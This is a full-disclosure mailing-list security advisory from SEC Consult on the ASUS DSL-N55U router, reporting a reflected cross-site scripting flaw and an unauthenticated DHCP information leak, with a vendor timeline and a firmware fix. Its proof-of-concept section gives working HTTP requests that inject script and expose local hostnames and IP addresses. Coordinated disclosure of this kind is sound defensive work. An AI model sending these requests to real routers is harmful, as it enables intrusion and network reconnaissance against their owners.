[<prev] [next>] [day] [month] [year] [list]
Message-ID: <f19cb45d-b571-00cb-72f3-146d86b371dd@sec-consult.com>
Date: Fri, 24 Jun 2016 10:58:37 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <bugtraq@...urityfocus.com>, <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and
information disclosure
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
=======================================================================
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."
Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS
Business recommendation:
------------------------
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
-----------------------------------
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
No authentication is required.
2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.
Proof of concept:
-----------------
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host: <ASUS router IP>
HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
<HTML><HEAD><script>location.href='/cloud_sync.asp?flag=111111111111111111111111111111111111111'+alert('XSS')+'';</script>
</HEAD></HTML>
2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host: <ASUS router IP>
HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['<ip-1>', '<hostname-1>'],['<ip-2>',
'<hostname-2>'],['<ip-N>', '<hostname-N>']];;
function initial(){
[...]
Vulnerable / tested versions:
-----------------------------
The following firmware has been tested which was the most recent version
at the time of discovery:
- 3.0.0.4.376_2736 (2015/01/19 update)
URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/
Vendor contact timeline:
------------------------
2016-06-02: Contacting vendor through privacy@...s.com and netadmin@...s.com.tw.
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.
Solution:
---------
Upgrade to firmware version 3.0.0.4_380_3679 or later.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2016
Download attachment "smime.p7s" of type "application/pkcs7-signature" (3993 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists